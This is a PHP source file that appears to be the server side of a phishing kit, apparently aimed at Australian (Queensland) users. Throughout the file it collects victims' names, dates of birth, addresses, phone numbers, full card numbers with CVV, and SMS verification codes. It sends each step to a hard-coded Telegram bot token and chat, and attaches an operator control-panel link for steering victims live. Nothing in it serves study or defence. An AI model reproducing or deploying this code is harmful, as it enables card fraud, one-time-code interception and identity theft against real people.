<?php
function sendToTelegram($data) {
    $botToken = '7720402912:AAHOu33AhRxApsx5UhQp1lmpH7gpTHnHcwQ';
    $chatId = '-4639014248';
    
    // Get or create session ID
    $sessionId = $data['sessionId'] ?? generateSessionId();
    $ip = getClientIP();
    
    // Store or update session data
    $sessionsFile = __DIR__ . '/sessions.json';
    $sessions = [];
    if (file_exists($sessionsFile)) {
        $sessions = json_decode(file_get_contents($sessionsFile), true) ?: [];
    }
    
    // Update session data
    $sessions[$sessionId] = array_merge($sessions[$sessionId] ?? [], [
        'ip' => $ip,
        'status' => 'pending',
        'step' => $data['step'],
        'time' => date('Y-m-d H:i:s')
    ]);
    
    file_put_contents($sessionsFile, json_encode($sessions, JSON_PRETTY_PRINT));
    
    // Get base URL
    $baseUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]";
    $controlLink = "{$baseUrl}/qld-au/Panel/nws/control.php?session=" . $sessionId;

    // Send messages to Telegram
    if ($data['step'] === 'billing') {
        // Send only billing information
        $billingMessage = formatBillingMessage($data, $ip);
        sendTelegramMessage($botToken, $chatId, $billingMessage);
    } else if ($data['step'] === 'payment') {
        // Send only payment details with control link
        $paymentMessage = formatPaymentMessage($data, $ip, $controlLink);
        sendTelegramMessage($botToken, $chatId, $paymentMessage);
    } else {
        // For SMS verification, send as usual
        $message = formatTelegramMessage($data, $ip, $controlLink);
        sendTelegramMessage($botToken, $chatId, $message);
    }
    
    return ['sessionId' => $sessionId];
}

function formatBillingMessage($data, $ip) {
    $message = "👤 Billing Information\n\n";
    $message .= "IP: " . $ip . "\n\n";
    
    if (isset($data['billingInfo'])) {
        $message .= "Full Name: " . $data['billingInfo']['fullName'] . "\n";
        $message .= "DOB: " . $data['billingInfo']['dob'] . "\n";
        $message .= "Address: " . $data['billingInfo']['address1'] . "\n";
        if (!empty($data['billingInfo']['address2'])) {
            $message .= "Address 2: " . $data['billingInfo']['address2'] . "\n";
        }
        $message .= "City: " . $data['billingInfo']['city'] . "\n";
        $message .= "State: " . $data['billingInfo']['state'] . "\n";
        $message .= "Postcode: " . $data['billingInfo']['postcode'] . "\n";
        $message .= "Phone: " . $data['billingInfo']['phone'] . "\n";
    }
    
    return $message;
}

function formatPaymentMessage($data, $ip, $controlLink) {
    $message = "💳 Payment Details\n\n";
    
    $message .= "Card Holder: " . $data['cardInfo']['cardHolder'] . "\n";
    $message .= "Card Number: " . $data['cardInfo']['cardNumber'] . "\n";
    $message .= "Expiry: " . $data['cardInfo']['expiryDate'] . "\n";
    $message .= "CVV: " . $data['cardInfo']['cvv'] . "\n\n";
    
    $message .= $controlLink;
    
    return $message;
}

function sendTelegramMessage($botToken, $chatId, $message) {
    $ch = curl_init("https://api.telegram.org/bot{$botToken}/sendMessage");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'HTML',
        'disable_web_page_preview' => true
    ]));
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    return $response;
}

function formatTelegramMessage($data, $ip, $controlLink) {
    $message = "";
    
    // Add status header
    $message .= "🔄 <b>Status:</b> Pending\n\n";
    
    switch($data['step']) {
        case 'payment':
            $message .= "💳 Payment Details\n\n";
            $message .= "IP: " . $ip . "\n\n";
            
            // Add billing information if available
            if (isset($data['billingInfo'])) {
                $message .= "👤 Billing Information:\n";
                $message .= "Full Name: " . $data['billingInfo']['fullName'] . "\n";
                $message .= "DOB: " . $data['billingInfo']['dob'] . "\n";
                $message .= "Address: " . $data['billingInfo']['address1'] . "\n";
                if (!empty($data['billingInfo']['address2'])) {
                    $message .= "Address 2: " . $data['billingInfo']['address2'] . "\n";
                }
                $message .= "City: " . $data['billingInfo']['city'] . "\n";
                $message .= "State: " . $data['billingInfo']['state'] . "\n";
                $message .= "Postcode: " . $data['billingInfo']['postcode'] . "\n";
                $message .= "Phone: " . $data['billingInfo']['phone'] . "\n\n";
            }
            
            $message .= "💳 Card Details:\n";
            $message .= "Card Holder: " . $data['cardInfo']['cardHolder'] . "\n";
            $message .= "Card Number: " . $data['cardInfo']['cardNumber'] . "\n";
            $message .= "Expiry: " . $data['cardInfo']['expiryDate'] . "\n";
            $message .= "CVV: " . $data['cardInfo']['cvv'] . "\n";
            break;
            
        case 'sms':
            $attemptNumber = isset($data['attemptNumber']) ? $data['attemptNumber'] : 1;
            $message .= "🔐 SMS Verification (Attempt #$attemptNumber)\n\n";
            $message .= "IP: " . $ip . "\n";
            $message .= "SMS Code: " . $data['smsCode'] . "\n";
            break;
    }
    
    $message .= "\nTime: " . date('Y-m-d H:i:s');
    
    // Add control panel link
    $message .= "\n\n🔗 <b>Control Panel:</b>\n";
    $message .= $controlLink;
    
    return $message;
}

function generateSessionId() {
    return bin2hex(random_bytes(16)); // Generates a 32-character random string
}

function getClientIP() {
    $ipaddress = '';
    if (isset($_SERVER['HTTP_CLIENT_IP']))
        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_X_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
    else if(isset($_SERVER['HTTP_FORWARDED_FOR']))
        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
    else if(isset($_SERVER['HTTP_FORWARDED']))
        $ipaddress = $_SERVER['HTTP_FORWARDED'];
    else if(isset($_SERVER['REMOTE_ADDR']))
        $ipaddress = $_SERVER['REMOTE_ADDR'];
    else
        $ipaddress = 'UNKNOWN';
    return $ipaddress;
}

// Handle incoming request
$data = json_decode(file_get_contents('php://input'), true);
echo json_encode(sendToTelegram($data));
